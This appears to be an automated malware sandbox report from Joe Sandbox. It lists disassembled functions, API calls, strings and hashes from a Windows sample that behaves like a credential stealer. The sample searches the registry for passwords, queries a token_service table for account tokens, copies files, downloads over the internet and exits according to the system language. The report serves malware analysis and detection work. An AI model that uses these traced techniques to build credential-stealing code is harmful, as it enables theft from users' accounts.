Instruction Fuzzy Hash: FC318476D00509EBCB14EBA0DD45DEF7779AF94304F14402EF502772A0CA38A946CFA9

Function 007F1122 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 007F1152

Part of subcall function 007F8AE7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8B12

Part of subcall function 007F8F67: StrStrA.SHLWAPI(?,?), ref: 007F8F73

lstrcpy.KERNEL32(?,00000000), ref: 007F118E

Part of subcall function 007F8F67: lstrcpyn.KERNEL32(0062D378,?,?), ref: 007F8F97
Part of subcall function 007F8F67: lstrlen.KERNEL32(?), ref: 007F8FAE
Part of subcall function 007F8F67: wsprintfA.USER32 ref: 007F8FCE

lstrcpy.KERNEL32(?,00000000), ref: 007F11D6
lstrcpy.KERNEL32(?,00000000), ref: 007F121E
lstrcpy.KERNEL32(?,00000000), ref: 007F1265
lstrcpy.KERNEL32(?,00000000), ref: 007F12AD
lstrcpy.KERNEL32(?,00000000), ref: 007F12F5
lstrcpy.KERNEL32(?,00000000), ref: 007F133C
lstrcpy.KERNEL32(?,00000000), ref: 007F1384

Part of subcall function 007FA457: lstrlen.KERNEL32(007E51BC,?,?,007E51BC,00420DC6), ref: 007FA462
Part of subcall function 007FA457: lstrcpy.KERNEL32(00420DC6,00000000), ref: 007FA4BC

strtok_s.MSVCRT ref: 007F14C7

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
String ID:
API String ID: 4276352425-0
Opcode ID: 68a2d24753a1513c6aef67d33b551a0f9d0662a975781c29fc71ea49a84acd3d
Instruction ID: 58c258c814d0a37a5bebb15d5410390159fac67d61c9484525d6618e7d23fa05
Opcode Fuzzy Hash: 68a2d24753a1513c6aef67d33b551a0f9d0662a975781c29fc71ea49a84acd3d
Instruction Fuzzy Hash: 127143B190011CEBCB54FBA0DC9DEFE7779AF64300F048999F209A3241EE795A859F61

Function 00407310 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407354
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CD0), ref: 0040737A
RegEnumValueA.ADVAPI32(00407CD0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073F1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040744D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407492
HeapFree.KERNEL32(00000000,?,?,?,?,00407CD0,80000001,00415CA4,?,?,?,?,?,00407CD0,?), ref: 00407499

Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB

task.LIBCPMTD ref: 00407595

Strings

Password, xrefs: 00407441

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
Instruction ID: 975b1f2fff90f96d03099a1470760af69fc6b50b1064dc5ad3510b71ddc5061f
Opcode Fuzzy Hash: e183b5279ab9e6df2eb167b03a4cc02d75207c5ff0d2bc4bafbb891a8174e7a2
Instruction Fuzzy Hash: 52613DB5D041689BDB24DF50CC41BDAB7B8BF48304F0081EAE689A6181DFB46BC9CF95

Function 007F7207 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 007F7249
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007F7286
GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F730A
RtlAllocateHeap.NTDLL(00000000), ref: 007F7311
wsprintfA.USER32 ref: 007F7347

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

Strings

C, xrefs: 007F7253
\, xrefs: 007F7267
:, xrefs: 007F7263

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
Instruction ID: e2638db849a4da7179b3a1c85b0463fd3a2382248b9be23683189c633a50914c
Opcode Fuzzy Hash: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
Instruction Fuzzy Hash: E44192B1D0424CEBDB14DFA4CC45BEEBBB9EF08710F104099F60967280D7796A44CBA5

Function 00417BA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0087B420,00000000,?,00420DFC,00000000,?,00000000), ref: 00417BD0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0087B420,00000000,?,00420DFC,00000000,?,00000000,00000000), ref: 00417BD7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00417BF8
__aulldiv.LIBCMT ref: 00417C12
__aulldiv.LIBCMT ref: 00417C20
wsprintfA.USER32 ref: 00417C4C

Strings

@, xrefs: 00417BED
%d MB, xrefs: 00417C43

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
Instruction ID: f6ead53c39b4582a22ff827f4f83d0c2aee1884270de42e44796eba59a74ffdb
Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
Instruction Fuzzy Hash: AD218CF1E44218ABDB10DFD8CC49FAEB7B9FB08B14F104509F605BB280D77869018BA9

Function 007F8D17 Relevance: 13.7, APIs: 9, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9f047200f8116b413e600791e05f906d97910a1c0cd49f959a1d8fbefd8990
Instruction ID: 246300995bd25208529403a056950008ea337679e221b6fecc26bd8b079180f5
Opcode Fuzzy Hash: 8a9f047200f8116b413e600791e05f906d97910a1c0cd49f959a1d8fbefd8990
Instruction Fuzzy Hash: B171F971A10208EBDB14DFE4DD89FEDB7BABF48700F108508F615AB294DB74A905CB61

Function 007E6357 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4AA1
Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4AB8
Part of subcall function 007E4A67: ??2@YAPAXI@Z.MSVCRT ref: 007E4ACF
Part of subcall function 007E4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AF0
Part of subcall function 007E4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4B00

InternetOpenA.WININET(00420DE2,00000001,00000000,00000000,00000000), ref: 007E63C6
StrCmpCA.SHLWAPI(?,0062CC80), ref: 007E63FE
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007E6446
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007E646A
InternetReadFile.WININET(?,?,00000400,?), ref: 007E6493
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007E64C1
CloseHandle.KERNEL32(?,?,00000400), ref: 007E6500
InternetCloseHandle.WININET(?), ref: 007E650A
InternetCloseHandle.WININET(00000000), ref: 007E6517

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 4287319946-0
Opcode ID: dd83a9a1611299f042519b8bf1041a45b3118b876c97b28edd9378a90b5cbde8
Instruction ID: 2f5ba602979157832b1ed1e7ea17010c1e32e2fad4d4b3787c71d69702707f75
Opcode Fuzzy Hash: dd83a9a1611299f042519b8bf1041a45b3118b876c97b28edd9378a90b5cbde8
Instruction Fuzzy Hash: 8D5171B1A00258ABDB20DF61DC49BEE7779AF18341F108099F705A71C0DB78AB85DF55

Function 007F4AB7 Relevance: 12.6, APIs: 10, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007F4ACE

Part of subcall function 007F8AE7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8B12

lstrcat.KERNEL32(?,00000000), ref: 007F4AF7
lstrcat.KERNEL32(?,00420FD0), ref: 007F4B14

Part of subcall function 007F4657: wsprintfA.USER32 ref: 007F4673
Part of subcall function 007F4657: FindFirstFileA.KERNEL32(?,?), ref: 007F468A

memset.MSVCRT ref: 007F4B5A
lstrcat.KERNEL32(?,00000000), ref: 007F4B83
lstrcat.KERNEL32(?,00420FF0), ref: 007F4BA0

Part of subcall function 007F4657: StrCmpCA.SHLWAPI(?,00420FAC), ref: 007F46B8
Part of subcall function 007F4657: StrCmpCA.SHLWAPI(?,00420FB0), ref: 007F46CE
Part of subcall function 007F4657: FindNextFileA.KERNEL32(000000FF,?), ref: 007F48C4
Part of subcall function 007F4657: FindClose.KERNEL32(000000FF), ref: 007F48D9

memset.MSVCRT ref: 007F4BE6
lstrcat.KERNEL32(?,00000000), ref: 007F4C0F
lstrcat.KERNEL32(?,00421008), ref: 007F4C2C

Part of subcall function 007F4657: wsprintfA.USER32 ref: 007F46F7
Part of subcall function 007F4657: StrCmpCA.SHLWAPI(?,004208BA), ref: 007F470C
Part of subcall function 007F4657: wsprintfA.USER32 ref: 007F4729
Part of subcall function 007F4657: PathMatchSpecA.SHLWAPI(?,?), ref: 007F4765
Part of subcall function 007F4657: lstrcat.KERNEL32(?,0062CD24), ref: 007F4791
Part of subcall function 007F4657: lstrcat.KERNEL32(?,00420FC8), ref: 007F47A3
Part of subcall function 007F4657: lstrcat.KERNEL32(?,?), ref: 007F47B7
Part of subcall function 007F4657: lstrcat.KERNEL32(?,00420FCC), ref: 007F47C9
Part of subcall function 007F4657: lstrcat.KERNEL32(?,?), ref: 007F47DD
Part of subcall function 007F4657: CopyFileA.KERNEL32(?,?,00000001), ref: 007F47F3
Part of subcall function 007F4657: DeleteFileA.KERNEL32(?), ref: 007F4878

memset.MSVCRT ref: 007F4C72

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 4017274736-0
Opcode ID: 564b9434a400b1217e53343cc8f60dc4e7864cb0dd0802c51d4d6ac657b0c160
Instruction ID: 846d30f1c3a86dfcd15e8df620a2e482633b7b0cc1762c9a258c2b401dba5600
Opcode Fuzzy Hash: 564b9434a400b1217e53343cc8f60dc4e7864cb0dd0802c51d4d6ac657b0c160
Instruction Fuzzy Hash: 48419B75A40218A7CB60F760DC4FFED77385B24700F408455B689A61C1EEF957C98BA6

Function 00416B70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00416B7E

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

OpenProcess.KERNEL32(001FFFFF,00000000,00416DAD,004205AD), ref: 00416BBC
memset.MSVCRT ref: 00416C0A
??_V@YAXPAX@Z.MSVCRT ref: 00416D5E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00416C2C

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: a6ee68ca11034ff8030c736304bc0965813dc6bb2750f6188608d63e09cfc2d9
Instruction ID: 7f38ab3eb3b1a919a3e5ec0c0fab515e305e32cb9f2de8b47bf31e49bfe0b2e9
Opcode Fuzzy Hash: a6ee68ca11034ff8030c736304bc0965813dc6bb2750f6188608d63e09cfc2d9
Instruction Fuzzy Hash: 285162B0D002189BDB24EB95DC45BEEB774AF44318F5041AEE50566281EB78AEC8CF5D

Function 007F7E07 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0062CB60,00000000,?,00420DFC,00000000,?,00000000), ref: 007F7E37
RtlAllocateHeap.NTDLL(00000000), ref: 007F7E3E
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007F7E5F
__aulldiv.LIBCMT ref: 007F7E79
__aulldiv.LIBCMT ref: 007F7E87
wsprintfA.USER32 ref: 007F7EB3

Strings

@, xrefs: 007F7E54

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: @
API String ID: 2774356765-2766056989
Opcode ID: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
Instruction ID: 349979fb37869fb2a2dd5c72e5dd5a7b44e1d03bd495dbc456048c6b0bf6de6f
Opcode Fuzzy Hash: a22fd26a20c89c12fe6cfaaf614cf5a2958407047c3d7a896a6bd652d51aa950
Instruction Fuzzy Hash: 8C2138B1E44208ABDB10DFD4CC49FAEB7B9FB44B14F104109F604BB280C7796901CBA4

Function 00416210 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,004164C6,00420ADA), ref: 00416214
ExitProcess.KERNEL32 ref: 00416245
ExitProcess.KERNEL32 ref: 0041624F
ExitProcess.KERNEL32 ref: 00416259
ExitProcess.KERNEL32 ref: 00416263
ExitProcess.KERNEL32 ref: 0041626D

Strings

*, xrefs: 0041622C

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 5ece0110b3631b66e0cf394c1ce0ab63be50b876c6328f41a651a73fa16b4c2b
Instruction ID: 0b6e22eaf0c44992244314602628df478572758edaaa30d1127695f9febd7a00
Opcode Fuzzy Hash: 5ece0110b3631b66e0cf394c1ce0ab63be50b876c6328f41a651a73fa16b4c2b
Instruction Fuzzy Hash: 49F05830908A08EFE764AFE0EA09F5CBB3AEF04713F108195F609C7290CB748A11DB55

Function 0040B8E0 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrlenA.KERNEL32(00000000), ref: 0040BADD

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BB0B
lstrlenA.KERNEL32(00000000), ref: 0040BBE3
lstrlenA.KERNEL32(00000000), ref: 0040BBF7

Strings

AccountTokens, xrefs: 0040B9A9
AccountTokens, xrefs: 0040B91A
SELECT service, encrypted_token FROM token_service, xrefs: 0040BA4B
AccountId, xrefs: 0040BB02

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 495bfac6e02df5209c09edb51da49093e67449cb6c527c89baf2cee11febdd53
Instruction ID: 210edd3ff24f1e31e7376af0b8f6dc5aafa9379f597eea4b8f30950ff7929db6
Opcode Fuzzy Hash: 495bfac6e02df5209c09edb51da49093e67449cb6c527c89baf2cee11febdd53
Instruction Fuzzy Hash: 32A16271911108ABCF14FBA1DC56EEE7339AF54318F40416EF40772191EF786A98CBAA

Function 007E7877 Relevance: 12.1, APIs: 8, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 007E7577: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E75E1
Part of subcall function 007E7577: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7658
Part of subcall function 007E7577: StrStrA.SHLWAPI(00000000,0042164C,00000000), ref: 007E76B4
Part of subcall function 007E7577: GetProcessHeap.KERNEL32(00000000,?), ref: 007E76F9
Part of subcall function 007E7577: HeapFree.KERNEL32(00000000), ref: 007E7700

lstrcat.KERNEL32(0062CE68,004217A0), ref: 007E78AD
lstrcat.KERNEL32(0062CE68,00000000), ref: 007E78EF
lstrcat.KERNEL32(0062CE68,004217A4), ref: 007E7901
lstrcat.KERNEL32(0062CE68,00000000), ref: 007E7936
lstrcat.KERNEL32(0062CE68,004217A8), ref: 007E7947
lstrcat.KERNEL32(0062CE68,00000000), ref: 007E797A
lstrcat.KERNEL32(0062CE68,004217AC), ref: 007E7994
task.LIBCPMTD ref: 007E79A2

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID:
API String ID: 2677904052-0
Opcode ID: 2d94d6c29896b6bcf089cf12ca884a39d170e877ea87200b8b8ed3d06784f7cd
Instruction ID: 36667418df68a7fc99d629a036fc0988d75b21e8d2cdb14a107f0202f45abd80
Opcode Fuzzy Hash: 2d94d6c29896b6bcf089cf12ca884a39d170e877ea87200b8b8ed3d06784f7cd
Instruction Fuzzy Hash: C5316372D00549DBCB18EFA0DC89DFE777AAF58701F145019F206A72A0DB38A942CF61

Function 007E5267 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007E5281
RtlAllocateHeap.NTDLL(00000000), ref: 007E5288
InternetOpenA.WININET(00420DC7,00000000,00000000,00000000,00000000), ref: 007E52A1
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 007E52C8
InternetReadFile.WININET(?,?,00000400,00000000), ref: 007E52F8
memcpy.MSVCRT ref: 007E5341
InternetCloseHandle.WININET(?), ref: 007E5370
InternetCloseHandle.WININET(?), ref: 007E537D

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: 1f26aa83fdae16558b0e2a81393cbeedd65db7e4cde47def787db510df4ed3d9
Instruction ID: 93a085436cf39865e6827e81b9bc013af0cecf2cc1335ea4335a96181f9830c8
Opcode Fuzzy Hash: 1f26aa83fdae16558b0e2a81393cbeedd65db7e4cde47def787db510df4ed3d9
Instruction Fuzzy Hash: 4331F5B4A00618ABDB20CF54DD85BDCB7B5BB48308F5081D9AB09A7281D7B46A858F58

Function 00405000 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
HeapAlloc.KERNEL32(00000000), ref: 00405021
InternetOpenA.WININET(00420DC7,00000000,00000000,00000000,00000000), ref: 0040503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
InternetReadFile.WININET(004159BB,?,00000400,00000000), ref: 00405091
memcpy.MSVCRT ref: 004050DA
InternetCloseHandle.WININET(004159BB), ref: 00405109
InternetCloseHandle.WININET(?), ref: 00405116

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
String ID:
API String ID: 3894370878-0
Opcode ID: d639e477f116241a0e401493819a9aeee025cbe198c1119cc2fd44f54bc7604c
Instruction ID: 839bf57ea29f75d8981f3e40a03c3eb3ba9ac3aa2e1ac21d7b315b502f3c448d
Opcode Fuzzy Hash: d639e477f116241a0e401493819a9aeee025cbe198c1119cc2fd44f54bc7604c
Instruction Fuzzy Hash: 1D31E9B4A00618ABDB20CF54DD85BDDB7B5EF48304F5081E9BA09A7281C7746AC68F99

Function 007F5257 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 007FA457: lstrlen.KERNEL32(007E51BC,?,?,007E51BC,00420DC6), ref: 007FA462
Part of subcall function 007FA457: lstrcpy.KERNEL32(00420DC6,00000000), ref: 007FA4BC

Part of subcall function 007FA377: lstrcpy.KERNEL32(00420DFF,00000000), ref: 007FA3BF

StrCmpCA.SHLWAPI(00000000,00421098,00000000), ref: 007F538B
StrCmpCA.SHLWAPI(00000000,004210A0), ref: 007F53E8
StrCmpCA.SHLWAPI(00000000,004210B0), ref: 007F559E

Part of subcall function 007FA3D7: lstrcpy.KERNEL32(?,00000000), ref: 007FA41D

Part of subcall function 007F4F37: StrCmpCA.SHLWAPI(00000000,0042105C), ref: 007F4F6F

Part of subcall function 007FA4D7: lstrcpy.KERNEL32(?,00420DFF), ref: 007FA53C

Part of subcall function 007F5007: StrCmpCA.SHLWAPI(00000000,0042106C,00000000), ref: 007F505F
Part of subcall function 007F5007: lstrlen.KERNEL32(00000000), ref: 007F5076
Part of subcall function 007F5007: StrStrA.SHLWAPI(00000000,00000000), ref: 007F50AB
Part of subcall function 007F5007: lstrlen.KERNEL32(00000000), ref: 007F50CA
Part of subcall function 007F5007: strtok.MSVCRT ref: 007F50E5
Part of subcall function 007F5007: lstrlen.KERNEL32(00000000), ref: 007F50F5

StrCmpCA.SHLWAPI(00000000,004210A8,00000000), ref: 007F54D2
StrCmpCA.SHLWAPI(00000000,004210B8,00000000), ref: 007F5687
StrCmpCA.SHLWAPI(00000000,004210C0), ref: 007F5753
Sleep.KERNEL32(0000EA60), ref: 007F5762

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID:
API String ID: 3630751533-0
Opcode ID: 08121a1a3ebc54953bab04f5efc3bfeeeb0d6a24de1ddcff76b2499818be489e
Instruction ID: e199de0212c67df3023d60c81aca1f7c4d6b5b68d0d3bc2ab590cc48c1a3eb88
Opcode Fuzzy Hash: 08121a1a3ebc54953bab04f5efc3bfeeeb0d6a24de1ddcff76b2499818be489e
Instruction Fuzzy Hash: 2AE15FB190064CEBCB14FBA4DC9ADFD7379AF54300F808528B74A52291EF7C6A09DB56

